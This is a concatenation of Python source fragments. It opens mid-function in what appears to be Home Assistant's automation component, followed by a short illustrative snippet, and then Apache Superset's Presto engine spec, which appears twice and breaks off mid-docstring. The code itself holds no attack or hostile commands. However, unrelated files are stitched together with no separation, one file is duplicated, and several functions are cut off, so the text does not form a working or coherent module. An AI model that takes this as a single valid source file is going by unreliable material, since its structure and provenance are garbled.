async_turn_on(self, **kwargs: Any) -> None: """Turn the entity on and update the state.""" await self.async_enable() async def async_turn_off(self, **kwargs: Any) -> None: """Turn the entity off.""" if CONF_STOP_ACTIONS in kwargs: await self.async_disable(kwargs[CONF_STOP_ACTIONS]) else: await self.async_disable() async def async_trigger(self, run_variables, context=None, skip_condition=False): """Trigger automation. This method is a coroutine. """ reason = "" if "trigger" in run_variables and "description" in run_variables["trigger"]: reason = f' by {run_variables["trigger"]["description"]}' self._logger.debug("Automation triggered%s", reason) # Create a new context referring to the old context. parent_id = None if context is None else context.id trigger_context = Context(parent_id=parent_id) with trace_automation( self.hass, self.unique_id, self._raw_config, trigger_context ) as automation_trace: if self._variables: try: variables = self._variables.async_render(self.hass, run_variables) except template.TemplateError as err: self._logger.error("Error rendering variables: %s", err) automation_trace.set_error(err) return else: variables = run_variables automation_trace.set_variables(variables) # Prepare tracing the evaluation of the automation's conditions automation_trace.set_condition_trace(trace_get()) if ( not skip_condition and self._cond_func is not None and not self._cond_func(variables) ): self._logger.debug( "Conditions not met, aborting automation. 
Condition summary: %s", trace_get(clear=False), ) return # Prepare tracing the execution of the automation's actions automation_trace.set_action_trace(trace_get()) self.async_set_context(trigger_context) event_data = { ATTR_NAME: self._name, ATTR_ENTITY_ID: self.entity_id, } if "trigger" in variables and "description" in variables["trigger"]: event_data[ATTR_SOURCE] = variables["trigger"]["description"] @callback def started_action(): self.hass.bus.async_fire( EVENT_AUTOMATION_TRIGGERED, event_data, context=trigger_context ) try: with trace_path("action"): await self.action_script.async_run( variables, trigger_context, started_action ) except (vol.Invalid, HomeAssistantError) as err: self._logger.error( "Error while executing automation %s: %s", self.entity_id, err, ) automation_trace.set_error(err) except Exception as err: # pylint: disable=broad-except self._logger.exception("While executing automation %s", self.entity_id) automation_trace.set_error(err) async def async_will_remove_from_hass(self): """Remove listeners when removing automation from Home Assistant.""" await super().async_will_remove_from_hass() await self.async_disable() async def async_enable(self): """Enable this automation entity. This method is a coroutine. """ if self._is_enabled: return self._is_enabled = True # HomeAssistant is starting up if self.hass.state != CoreState.not_running: self._async_detach_triggers = await self._async_attach_triggers(False) self.async_write_ha_state() return async def async_enable_automation(event): """Start automation on startup.""" # Don't do anything if no longer enabled or already attached if not self._is_enabled or self._async_detach_triggers is not None: return self._async_detach_triggers = await self._async_attach_triggers(True) self.hass.bus.async_listen_once( EVENT_HOMEASSISTANT_STARTED, async_enable_automation ) self.async_write_ha_state() async def async_disable(self, stop_actions=DEFAULT_STOP_ACTIONS): """Disable the automation entity.""" if not self._is_enabled and not self.action_script.runs: return self._is_enabled = False if self._async_detach_triggers is not None: self._async_detach_triggers() self._async_detach_triggers = None if stop_actions: await self.action_script.async_stop() self.async_write_ha_state() async def _async_attach_triggers( self, home_assistant_start: bool ) -> Callable[[], None] | None: """Set up the triggers.""" def log_cb(level, msg, **kwargs): self._logger.log(level, "%s %s", msg, self._name, **kwargs) variables = None if self._trigger_variables: try: variables = self._trigger_variables.async_render( self.hass, None, limited=True ) except template.TemplateError as err: self._logger.error("Error rendering trigger variables: %s", err) return None return await async_initialize_triggers( self.hass, self._trigger_config, self.async_trigger, DOMAIN, self._name, log_cb, home_assistant_start, variables, ) async def _async_process_config( hass: HomeAssistant, config: dict[str, Any], component: EntityComponent, ) -> bool: """Process config and add automations. Returns if blueprints were used. 
""" entities = [] blueprints_used = False for config_key in extract_domain_configs(config, DOMAIN): conf: list[dict[str, Any] | blueprint.BlueprintInputs] = config[ # type: ignore config_key ] for list_no, config_block in enumerate(conf): raw_config = None if isinstance(config_block, blueprint.BlueprintInputs): # type: ignore blueprints_used = True blueprint_inputs = config_block try: raw_config = blueprint_inputs.async_substitute() config_block = cast( Dict[str, Any], await async_validate_config_item(hass, raw_config), ) except vol.Invalid as err: LOGGER.error( "Blueprint %s generated invalid automation with inputs %s: %s", blueprint_inputs.blueprint.name, blueprint_inputs.inputs, humanize_error(config_block, err), ) continue else: raw_config = cast(AutomationConfig, config_block).raw_config automation_id = config_block.get(CONF_ID) name = config_block.get(CONF_ALIAS) or f"{config_key} {list_no}" initial_state = config_block.get(CONF_INITIAL_STATE) action_script = Script( hass, config_block[CONF_ACTION], name, DOMAIN, running_description="automation actions", script_mode=config_block[CONF_MODE], max_runs=config_block[CONF_MAX], max_exceeded=config_block[CONF_MAX_EXCEEDED], logger=LOGGER, # We don't pass variables here # Automation will already render them to use them in the condition # and so will pass them on to the script. ) if CONF_CONDITION in config_block: cond_func = await _async_process_if(hass, name, config, config_block) if cond_func is None: continue else: cond_func = None # Add trigger variables to variables variables = None if CONF_TRIGGER_VARIABLES in config_block: variables = ScriptVariables( dict(config_block[CONF_TRIGGER_VARIABLES].as_dict()) ) if CONF_VARIABLES in config_block: if variables: variables.variables.update(config_block[CONF_VARIABLES].as_dict()) else: variables = config_block[CONF_VARIABLES] entity = AutomationEntity( automation_id, name, config_block[CONF_TRIGGER], cond_func, action_script, initial_state, variables, config_block.get(CONF_TRIGGER_VARIABLES), raw_config, ) entities.append(entity) if entities: await component.async_add_entities(entities) return blueprints_used async def _async_process_if(hass, name, config, p_config): """Process if checks.""" if_configs = p_config[CONF_CONDITION] checks = [] for if_config in if_configs: try: checks.append(await condition.async_from_config(hass, if_config, False)) except HomeAssistantError as ex: LOGGER.warning("Invalid condition: %s", ex) return None def if_action(variables=None): """AND all conditions.""" errors = [] for index, check in enumerate(checks): try: with trace_path(["condition", str(index)]): if not check(hass, variables): return False except ConditionError as ex: errors.append( ConditionErrorIndex( "condition", index=index, total=len(checks), error=ex ) ) if errors: LOGGER.warning( "Error evaluating condition in '%s':\n%s", name, ConditionErrorContainer("condition", errors=errors), ) return False return True if_action.config = if_configs return if_action @callback def _trigger_extract_device(trigger_conf: dict) -> str | None: """Extract devices from a trigger config.""" if trigger_conf[CONF_PLATFORM] != "device": return None return trigger_conf[CONF_DEVICE_ID] @callback def _trigger_extract_entities(trigger_conf: dict) -> list[str]: """Extract entities from a trigger config.""" if trigger_conf[CONF_PLATFORM] in ("state", "numeric_state"): return trigger_conf[CONF_ENTITY_ID] if trigger_conf[CONF_PLATFORM] == "zone": return trigger_conf[CONF_ENTITY_ID] + [trigger_conf[CONF_ZONE]] if 
trigger_conf[CONF_PLATFORM] == "geo_location": return [trigger_conf[CONF_ZONE]] if trigger_conf[CONF_PLATFORM] == "sun": return ["sun.sun"] return []
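# --- Illustrative example of trigger extraction (not part of the component) --
# AutomationEntity.referenced_entities / referenced_devices above are built by
# walking the trigger config with _trigger_extract_entities() and
# _trigger_extract_device(). The stand-alone mirror below shows what those
# helpers return for a few common trigger shapes; the dict keys correspond to
# the CONF_* constants ("platform", "entity_id", "zone", "device_id") and the
# entity ids are made up.
state_trigger = {"platform": "state", "entity_id": ["light.kitchen"]}
zone_trigger = {
    "platform": "zone",
    "entity_id": ["device_tracker.phone"],
    "zone": "zone.home",
}
device_trigger = {"platform": "device", "device_id": "abcdef123456"}


def extract_entities(conf: dict) -> list:
    """Plain-dict mirror of _trigger_extract_entities() for illustration."""
    if conf["platform"] in ("state", "numeric_state"):
        return conf["entity_id"]
    if conf["platform"] == "zone":
        return conf["entity_id"] + [conf["zone"]]
    if conf["platform"] == "geo_location":
        return [conf["zone"]]
    if conf["platform"] == "sun":
        return ["sun.sun"]
    return []


print(extract_entities(state_trigger))    # ['light.kitchen']
print(extract_entities(zone_trigger))     # ['device_tracker.phone', 'zone.home']
print(device_trigger.get("device_id"))    # 'abcdef123456' -> referenced_devices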
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=C,R,W from collections import OrderedDict from datetime import datetime from distutils.version import StrictVersion import logging import re import textwrap import time from typing import Any, Dict, List, Optional, Set, Tuple from urllib import parse from sqlalchemy import Column, literal_column from sqlalchemy.engine.base import Engine from sqlalchemy.engine.reflection import Inspector from sqlalchemy.engine.result import RowProxy from sqlalchemy.sql.expression import ColumnClause, Select from superset import is_feature_enabled from superset.db_engine_specs.base import BaseEngineSpec from superset.exceptions import SupersetTemplateException from superset.models.sql_types.presto_sql_types import type_map as presto_type_map from superset.utils import core as utils QueryStatus = utils.QueryStatus class PrestoEngineSpec(BaseEngineSpec): engine = "presto" _time_grain_functions = { None: "{col}", "PT1S": "date_trunc('second', CAST({col} AS TIMESTAMP))", "PT1M": "date_trunc('minute', CAST({col} AS TIMESTAMP))", "PT1H": "date_trunc('hour', CAST({col} AS TIMESTAMP))", "P1D": "date_trunc('day', CAST({col} AS TIMESTAMP))", "P1W": "date_trunc('week', CAST({col} AS TIMESTAMP))", "P1M": "date_trunc('month', CAST({col} AS TIMESTAMP))", "P0.25Y": "date_trunc('quarter', CAST({col} AS TIMESTAMP))", "P1Y": "date_trunc('year', CAST({col} AS TIMESTAMP))", "P1W/1970-01-03T00:00:00Z": "date_add('day', 5, date_trunc('week', " "date_add('day', 1, CAST({col} AS TIMESTAMP))))", "1969-12-28T00:00:00Z/P1W": "date_add('day', -1, date_trunc('week', " "date_add('day', 1, CAST({col} AS TIMESTAMP))))", } @classmethod def get_view_names(cls, inspector: Inspector, schema: Optional[str]) -> List[str]: """Returns an empty list get_table_names() function returns all table names and view names, and get_view_names() is not implemented in sqlalchemy_presto.py https://github.com/dropbox/PyHive/blob/e25fc8440a0686bbb7a5db5de7cb1a77bdb4167a/pyhive/sqlalchemy_presto.py """ return [] @classmethod def _create_column_info(cls, name: str, data_type: str) -> dict: """ Create column info object :param name: column name :param data_type: column data type :return: column info object """ return {"name": name, "type": f"{data_type}"} @classmethod def _get_full_name(cls, names: List[Tuple[str, str]]) -> str: """ Get the full column name :param names: list of all individual column names :return: full column name """ return ".".join(column[0] for column in names if column[0]) @classmethod def _has_nested_data_types(cls, component_type: str) -> bool: """ Check if string contains a data type. 
We determine if there is a data type by whitespace or multiple data types by commas :param component_type: data type :return: boolean """ comma_regex = r",(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" white_space_regex = r"\s(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" return ( re.search(comma_regex, component_type) is not None or re.search(white_space_regex, component_type) is not None ) @classmethod def _split_data_type(cls, data_type: str, delimiter: str) -> List[str]: """ Split data type based on given delimiter. Do not split the string if the delimiter is enclosed in quotes :param data_type: data type :param delimiter: string separator (i.e. open parenthesis, closed parenthesis, comma, whitespace) :return: list of strings after breaking it by the delimiter """ return re.split( r"{}(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)".format(delimiter), data_type ) @classmethod def _parse_structural_column( cls, parent_column_name: str, parent_data_type: str, result: List[dict] ) -> None: """ Parse a row or array column :param result: list tracking the results """ formatted_parent_column_name = parent_column_name # Quote the column name if there is a space if " " in parent_column_name: formatted_parent_column_name = f'"{parent_column_name}"' full_data_type = f"{formatted_parent_column_name} {parent_data_type}" original_result_len = len(result) # split on open parenthesis ( to get the structural # data type and its component types data_types = cls._split_data_type(full_data_type, r"\(") stack: List[Tuple[str, str]] = [] for data_type in data_types: # split on closed parenthesis ) to track which component # types belong to what structural data type inner_types = cls._split_data_type(data_type, r"\)") for inner_type in inner_types: # We have finished parsing multiple structural data types if not inner_type and len(stack) > 0: stack.pop() elif cls._has_nested_data_types(inner_type): # split on comma , to get individual data types single_fields = cls._split_data_type(inner_type, ",") for single_field in single_fields: single_field = single_field.strip() # If component type starts with a comma, the first single field # will be an empty string. Disregard this empty string. if not single_field: continue # split on whitespace to get field name and data type field_info = cls._split_data_type(single_field, r"\s") # check if there is a structural data type within # overall structural data type if field_info[1] == "array" or field_info[1] == "row": stack.append((field_info[0], field_info[1])) full_parent_path = cls._get_full_name(stack) result.append( cls._create_column_info( full_parent_path, presto_type_map[field_info[1]]() ) ) else: # otherwise this field is a basic data type full_parent_path = cls._get_full_name(stack) column_name = "{}.{}".format( full_parent_path, field_info[0] ) result.append( cls._create_column_info( column_name, presto_type_map[field_info[1]]() ) ) # If the component type ends with a structural data type, do not pop # the stack. We have run across a structural data type within the # overall structural data type. Otherwise, we have completely parsed # through the entire structural data type and can move on. if not (inner_type.endswith("array") or inner_type.endswith("row")): stack.pop() # We have an array of row objects (i.e. array(row(...))) elif "array" == inner_type or "row" == inner_type: # Push a dummy object to represent the structural data type stack.append(("", inner_type)) # We have an array of a basic data types(i.e. array(varchar)). elif len(stack) > 0: # Because it is an array of a basic data type. 
We have finished # parsing the structural data type and can move on. stack.pop() # Unquote the column name if necessary if formatted_parent_column_name != parent_column_name: for index in range(original_result_len, len(result)): result[index]["name"] = result[index]["name"].replace( formatted_parent_column_name, parent_column_name ) @classmethod def _show_columns( cls, inspector: Inspector, table_name: str, schema: Optional[str] ) -> List[RowProxy]: """ Show presto column names :param inspector: object that performs database schema inspection :param table_name: table name :param schema: schema name :return: list of column objects """ quote = inspector.engine.dialect.identifier_preparer.quote_identifier full_table = quote(table_name) if schema: full_table = "{}.{}".format(quote(schema), full_table) columns = inspector.bind.execute("SHOW COLUMNS FROM {}".format(full_table)) return columns @classmethod def get_columns( cls, inspector: Inspector, table_name: str, schema: Optional[str] ) -> List[Dict[str, Any]]: """ Get columns from a Presto data source. This includes handling row and array data types :param inspector: object that performs database schema inspection :param table_name: table name :param schema: schema name :return: a list of results that contain column info (i.e. column name and data type) """ columns = cls._show_columns(inspector, table_name, schema) result: List[dict] = [] for column in columns: try: # parse column if it is a row or array if is_feature_enabled("PRESTO_EXPAND_DATA") and ( "array" in column.Type or "row" in column.Type ): structural_column_index = len(result) cls._parse_structural_column(column.Column, column.Type, result) result[structural_column_index]["nullable"] = getattr( column, "Null", True ) result[structural_column_index]["default"] = None continue else: # otherwise column is a basic data type column_type = presto_type_map[column.Type]() except KeyError: logging.info( "Did not recognize type {} of column {}".format( column.Type, column.Column ) ) column_type = "OTHER" column_info = cls._create_column_info(column.Column, column_type) column_info["nullable"] = getattr(column, "Null", True) column_info["default"] = None result.append(column_info) return result @classmethod def _is_column_name_quoted(cls, column_name: str) -> bool: """ Check if column name is in quotes :param column_name: column name :return: boolean """ return column_name.startswith('"') and column_name.endswith('"') @classmethod def _get_fields(cls, cols: List[dict]) -> List[ColumnClause]: """ Format column clauses where names are in quotes and labels are specified :param cols: columns :return: column clauses """ column_clauses = [] # Column names are separated by periods. This regex will find periods in a # string if they are not enclosed in quotes because if a period is enclosed in # quotes, then that period is part of a column name. dot_pattern = r"""\. 
# split on period (?= # look ahead (?: # create non-capture group [^\"]*\"[^\"]*\" # two quotes )*[^\"]*$) # end regex""" dot_regex = re.compile(dot_pattern, re.VERBOSE) for col in cols: # get individual column names col_names = re.split(dot_regex, col["name"]) # quote each column name if it is not already quoted for index, col_name in enumerate(col_names): if not cls._is_column_name_quoted(col_name): col_names[index] = '"{}"'.format(col_name) quoted_col_name = ".".join( col_name if cls._is_column_name_quoted(col_name) else f'"{col_name}"' for col_name in col_names ) # create column clause in the format "name"."name" AS "name.name" column_clause = literal_column(quoted_col_name).label(col["name"]) column_clauses.append(column_clause) return column_clauses @classmethod def _filter_out_array_nested_cols( cls, cols: List[dict] ) -> Tuple[List[dict], List[dict]]: """ Filter out columns that correspond to array content. We know which columns to skip because cols is a list provided to us in a specific order where a structural column is positioned right before its content. Example: Column Name: ColA, Column Data Type: array(row(nest_obj int)) cols = [ ..., ColA, ColA.nest_obj, ... ] When we run across an array, check if subsequent column names start with the array name and skip them. :param cols: columns :return: filtered list of columns and list of array columns and its nested fields """ filtered_cols = [] array_cols = [] curr_array_col_name = None for col in cols: # col corresponds to an array's content and should be skipped if curr_array_col_name and col["name"].startswith(curr_array_col_name): array_cols.append(col) continue # col is an array so we need to check if subsequent # columns correspond to the array's contents elif str(col["type"]) == "ARRAY": curr_array_col_name = col["name"] array_cols.append(col) filtered_cols.append(col) else: curr_array_col_name = None filtered_cols.append(col) return filtered_cols, array_cols @classmethod def select_star( cls, database, table_name: str, engine: Engine, schema: str = None, limit: int = 100, show_cols: bool = False, indent: bool = True, latest_partition: bool = True, cols: Optional[List[Dict[str, Any]]] = None, ) -> str: """ Include selecting properties of row objects. We cannot easily break arrays into rows, so render the whole array in its own row and skip columns that correspond to an array's contents. 
""" cols = cols or [] presto_cols = cols if is_feature_enabled("PRESTO_EXPAND_DATA") and show_cols: dot_regex = r"\.(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" presto_cols = [ col for col in presto_cols if not re.search(dot_regex, col["name"]) ] return super().select_star( database, table_name, engine, schema, limit, show_cols, indent, latest_partition, presto_cols, ) @classmethod def adjust_database_uri(cls, uri, selected_schema=None): database = uri.database if selected_schema and database: selected_schema = parse.quote(selected_schema, safe="") if "/" in database: database = database.split("/")[0] + "/" + selected_schema else: database += "/" + selected_schema uri.database = database return uri @classmethod def convert_dttm(cls, target_type: str, dttm: datetime) -> str: tt = target_type.upper() if tt == "DATE": return "from_iso8601_date('{}')".format(dttm.isoformat()[:10]) if tt == "TIMESTAMP": return "from_iso8601_timestamp('{}')".format(dttm.isoformat()) return "'{}'".format(dttm.strftime("%Y-%m-%d %H:%M:%S")) @classmethod def epoch_to_dttm(cls) -> str: return "from_unixtime({col})" @classmethod def get_all_datasource_names( cls, db, datasource_type: str ) -> List[utils.DatasourceName]: datasource_df = db.get_df( "SELECT table_schema, table_name FROM INFORMATION_SCHEMA.{}S " "ORDER BY concat(table_schema, '.', table_name)".format( datasource_type.upper() ), None, ) datasource_names: List[utils.DatasourceName] = [] for unused, row in datasource_df.iterrows(): datasource_names.append( utils.DatasourceName( schema=row["table_schema"], table=row["table_name"] ) ) return datasource_names @classmethod def _build_column_hierarchy( cls, columns: List[dict], parent_column_types: List[str], column_hierarchy: dict ) -> None: """ Build a graph where the root node represents a column whose data type is in parent_column_types. 
A node's children represent that column's nested fields :param columns: list of columns :param parent_column_types: list of data types that decide what columns can be root nodes :param column_hierarchy: dictionary representing the graph """ if len(columns) == 0: return root = columns.pop(0) root_info = {"type": root["type"], "children": []} column_hierarchy[root["name"]] = root_info while columns: column = columns[0] # If the column name does not start with the root's name, # then this column is not a nested field if not column["name"].startswith(f"{root['name']}."): break # If the column's data type is one of the parent types, # then this column may have nested fields if str(column["type"]) in parent_column_types: cls._build_column_hierarchy( columns, parent_column_types, column_hierarchy ) root_info["children"].append(column["name"]) continue else: # The column is a nested field root_info["children"].append(column["name"]) columns.pop(0) @classmethod def _create_row_and_array_hierarchy( cls, selected_columns: List[dict] ) -> Tuple[dict, dict, List[dict]]: """ Build graphs where the root node represents a row or array and its children are that column's nested fields :param selected_columns: columns selected in a query :return: graph representing a row, graph representing an array, and a list of all the nested fields """ row_column_hierarchy: OrderedDict = OrderedDict() array_column_hierarchy: OrderedDict = OrderedDict() expanded_columns: List[dict] = [] for column in selected_columns: if column["type"].startswith("ROW"): parsed_row_columns: List[dict] = [] cls._parse_structural_column( column["name"], column["type"].lower(), parsed_row_columns ) expanded_columns = expanded_columns + parsed_row_columns[1:] filtered_row_columns, array_columns = cls._filter_out_array_nested_cols( parsed_row_columns ) cls._build_column_hierarchy( filtered_row_columns, ["ROW"], row_column_hierarchy ) cls._build_column_hierarchy( array_columns, ["ROW", "ARRAY"], array_column_hierarchy ) elif column["type"].startswith("ARRAY"): parsed_array_columns: List[dict] = [] cls._parse_structural_column( column["name"], column["type"].lower(), parsed_array_columns ) expanded_columns = expanded_columns + parsed_array_columns[1:] cls._build_column_hierarchy( parsed_array_columns, ["ROW", "ARRAY"], array_column_hierarchy ) return row_column_hierarchy, array_column_hierarchy, expanded_columns @classmethod def _create_empty_row_of_data(cls, columns: List[dict]) -> dict: """ Create an empty row of data :param columns: list of columns :return: dictionary representing an empty row of data """ return {column["name"]: "" for column in columns} @classmethod def _expand_row_data(cls, datum: dict, column: str, column_hierarchy: dict) -> None: """ Separate out nested fields and its value in a row of data :param datum: row of data :param column: row column name :param column_hierarchy: dictionary tracking structural columns and its nested fields """ if column in datum: row_data = datum[column] row_children = column_hierarchy[column]["children"] if row_data and len(row_data) != len(row_children): raise Exception( "The number of data values and number of nested " "fields are not equal" ) elif row_data: for index, data_value in enumerate(row_data): datum[row_children[index]] = data_value else: for row_child in row_children: datum[row_child] = "" @classmethod def _split_array_columns_by_process_state( cls, array_columns: List[str], array_column_hierarchy: dict, datum: dict ) -> Tuple[List[str], Set[str]]: """ Take a list of array columns and
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=C,R,W from collections import OrderedDict from datetime import datetime from distutils.version import StrictVersion import logging import re import textwrap import time from typing import Any, Dict, List, Optional, Set, Tuple from urllib import parse from sqlalchemy import Column, literal_column from sqlalchemy.engine.base import Engine from sqlalchemy.engine.reflection import Inspector from sqlalchemy.engine.result import RowProxy from sqlalchemy.sql.expression import ColumnClause, Select from superset import is_feature_enabled from superset.db_engine_specs.base import BaseEngineSpec from superset.exceptions import SupersetTemplateException from superset.models.sql_types.presto_sql_types import type_map as presto_type_map from superset.utils import core as utils QueryStatus = utils.QueryStatus class PrestoEngineSpec(BaseEngineSpec): engine = "presto" _time_grain_functions = { None: "{col}", "PT1S": "date_trunc('second', CAST({col} AS TIMESTAMP))", "PT1M": "date_trunc('minute', CAST({col} AS TIMESTAMP))", "PT1H": "date_trunc('hour', CAST({col} AS TIMESTAMP))", "P1D": "date_trunc('day', CAST({col} AS TIMESTAMP))", "P1W": "date_trunc('week', CAST({col} AS TIMESTAMP))", "P1M": "date_trunc('month', CAST({col} AS TIMESTAMP))", "P0.25Y": "date_trunc('quarter', CAST({col} AS TIMESTAMP))", "P1Y": "date_trunc('year', CAST({col} AS TIMESTAMP))", "P1W/1970-01-03T00:00:00Z": "date_add('day', 5, date_trunc('week', " "date_add('day', 1, CAST({col} AS TIMESTAMP))))", "1969-12-28T00:00:00Z/P1W": "date_add('day', -1, date_trunc('week', " "date_add('day', 1, CAST({col} AS TIMESTAMP))))", } @classmethod def get_view_names(cls, inspector: Inspector, schema: Optional[str]) -> List[str]: """Returns an empty list get_table_names() function returns all table names and view names, and get_view_names() is not implemented in sqlalchemy_presto.py https://github.com/dropbox/PyHive/blob/e25fc8440a0686bbb7a5db5de7cb1a77bdb4167a/pyhive/sqlalchemy_presto.py """ return [] @classmethod def _create_column_info(cls, name: str, data_type: str) -> dict: """ Create column info object :param name: column name :param data_type: column data type :return: column info object """ return {"name": name, "type": f"{data_type}"} @classmethod def _get_full_name(cls, names: List[Tuple[str, str]]) -> str: """ Get the full column name :param names: list of all individual column names :return: full column name """ return ".".join(column[0] for column in names if column[0]) @classmethod def _has_nested_data_types(cls, component_type: str) -> bool: """ Check if string contains a data type. 
We determine if there is a data type by whitespace or multiple data types by commas :param component_type: data type :return: boolean """ comma_regex = r",(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" white_space_regex = r"\s(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" return ( re.search(comma_regex, component_type) is not None or re.search(white_space_regex, component_type) is not None ) @classmethod def _split_data_type(cls, data_type: str, delimiter: str) -> List[str]: """ Split data type based on given delimiter. Do not split the string if the delimiter is enclosed in quotes :param data_type: data type :param delimiter: string separator (i.e. open parenthesis, closed parenthesis, comma, whitespace) :return: list of strings after breaking it by the delimiter """ return re.split( r"{}(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)".format(delimiter), data_type ) @classmethod def _parse_structural_column( cls, parent_column_name: str, parent_data_type: str, result: List[dict] ) -> None: """ Parse a row or array column :param result: list tracking the results """ formatted_parent_column_name = parent_column_name # Quote the column name if there is a space if " " in parent_column_name: formatted_parent_column_name = f'"{parent_column_name}"' full_data_type = f"{formatted_parent_column_name} {parent_data_type}" original_result_len = len(result) # split on open parenthesis ( to get the structural # data type and its component types data_types = cls._split_data_type(full_data_type, r"\(") stack: List[Tuple[str, str]] = [] for data_type in data_types: # split on closed parenthesis ) to track which component # types belong to what structural data type inner_types = cls._split_data_type(data_type, r"\)") for inner_type in inner_types: # We have finished parsing multiple structural data types if not inner_type and len(stack) > 0: stack.pop() elif cls._has_nested_data_types(inner_type): # split on comma , to get individual data types single_fields = cls._split_data_type(inner_type, ",") for single_field in single_fields: single_field = single_field.strip() # If component type starts with a comma, the first single field # will be an empty string. Disregard this empty string. if not single_field: continue # split on whitespace to get field name and data type field_info = cls._split_data_type(single_field, r"\s") # check if there is a structural data type within # overall structural data type if field_info[1] == "array" or field_info[1] == "row": stack.append((field_info[0], field_info[1])) full_parent_path = cls._get_full_name(stack) result.append( cls._create_column_info( full_parent_path, presto_type_map[field_info[1]]() ) ) else: # otherwise this field is a basic data type full_parent_path = cls._get_full_name(stack) column_name = "{}.{}".format( full_parent_path, field_info[0] ) result.append( cls._create_column_info( column_name, presto_type_map[field_info[1]]() ) ) # If the component type ends with a structural data type, do not pop # the stack. We have run across a structural data type within the # overall structural data type. Otherwise, we have completely parsed # through the entire structural data type and can move on. if not (inner_type.endswith("array") or inner_type.endswith("row")): stack.pop() # We have an array of row objects (i.e. array(row(...))) elif "array" == inner_type or "row" == inner_type: # Push a dummy object to represent the structural data type stack.append(("", inner_type)) # We have an array of a basic data types(i.e. array(varchar)). elif len(stack) > 0: # Because it is an array of a basic data type. 
We have finished # parsing the structural data type and can move on. stack.pop() # Unquote the column name if necessary if formatted_parent_column_name != parent_column_name: for index in range(original_result_len, len(result)): result[index]["name"] = result[index]["name"].replace( formatted_parent_column_name, parent_column_name ) @classmethod def _show_columns( cls, inspector: Inspector, table_name: str, schema: Optional[str] ) -> List[RowProxy]: """ Show presto column names :param inspector: object that performs database schema inspection :param table_name: table name :param schema: schema name :return: list of column objects """ quote = inspector.engine.dialect.identifier_preparer.quote_identifier full_table = quote(table_name) if schema: full_table = "{}.{}".format(quote(schema), full_table) columns = inspector.bind.execute("SHOW COLUMNS FROM {}".format(full_table)) return columns @classmethod def get_columns( cls, inspector: Inspector, table_name: str, schema: Optional[str] ) -> List[Dict[str, Any]]: """ Get columns from a Presto data source. This includes handling row and array data types :param inspector: object that performs database schema inspection :param table_name: table name :param schema: schema name :return: a list of results that contain column info (i.e. column name and data type) """ columns = cls._show_columns(inspector, table_name, schema) result: List[dict] = [] for column in columns: try: # parse column if it is a row or array if is_feature_enabled("PRESTO_EXPAND_DATA") and ( "array" in column.Type or "row" in column.Type ): structural_column_index = len(result) cls._parse_structural_column(column.Column, column.Type, result) result[structural_column_index]["nullable"] = getattr( column, "Null", True ) result[structural_column_index]["default"] = None continue else: # otherwise column is a basic data type column_type = presto_type_map[column.Type]() except KeyError: logging.info( "Did not recognize type {} of column {}".format( column.Type, column.Column ) ) column_type = "OTHER" column_info = cls._create_column_info(column.Column, column_type) column_info["nullable"] = getattr(column, "Null", True) column_info["default"] = None result.append(column_info) return result @classmethod def _is_column_name_quoted(cls, column_name: str) -> bool: """ Check if column name is in quotes :param column_name: column name :return: boolean """ return column_name.startswith('"') and column_name.endswith('"') @classmethod def _get_fields(cls, cols: List[dict]) -> List[ColumnClause]: """ Format column clauses where names are in quotes and labels are specified :param cols: columns :return: column clauses """ column_clauses = [] # Column names are separated by periods. This regex will find periods in a # string if they are not enclosed in quotes because if a period is enclosed in # quotes, then that period is part of a column name. dot_pattern = r"""\. 
# split on period (?= # look ahead (?: # create non-capture group [^\"]*\"[^\"]*\" # two quotes )*[^\"]*$) # end regex""" dot_regex = re.compile(dot_pattern, re.VERBOSE) for col in cols: # get individual column names col_names = re.split(dot_regex, col["name"]) # quote each column name if it is not already quoted for index, col_name in enumerate(col_names): if not cls._is_column_name_quoted(col_name): col_names[index] = '"{}"'.format(col_name) quoted_col_name = ".".join( col_name if cls._is_column_name_quoted(col_name) else f'"{col_name}"' for col_name in col_names ) # create column clause in the format "name"."name" AS "name.name" column_clause = literal_column(quoted_col_name).label(col["name"]) column_clauses.append(column_clause) return column_clauses @classmethod def _filter_out_array_nested_cols( cls, cols: List[dict] ) -> Tuple[List[dict], List[dict]]: """ Filter out columns that correspond to array content. We know which columns to skip because cols is a list provided to us in a specific order where a structural column is positioned right before its content. Example: Column Name: ColA, Column Data Type: array(row(nest_obj int)) cols = [ ..., ColA, ColA.nest_obj, ... ] When we run across an array, check if subsequent column names start with the array name and skip them. :param cols: columns :return: filtered list of columns and list of array columns and its nested fields """ filtered_cols = [] array_cols = [] curr_array_col_name = None for col in cols: # col corresponds to an array's content and should be skipped if curr_array_col_name and col["name"].startswith(curr_array_col_name): array_cols.append(col) continue # col is an array so we need to check if subsequent # columns correspond to the array's contents elif str(col["type"]) == "ARRAY": curr_array_col_name = col["name"] array_cols.append(col) filtered_cols.append(col) else: curr_array_col_name = None filtered_cols.append(col) return filtered_cols, array_cols @classmethod def select_star( cls, database, table_name: str, engine: Engine, schema: str = None, limit: int = 100, show_cols: bool = False, indent: bool = True, latest_partition: bool = True, cols: Optional[List[Dict[str, Any]]] = None, ) -> str: """ Include selecting properties of row objects. We cannot easily break arrays into rows, so render the whole array in its own row and skip columns that correspond to an array's contents. 
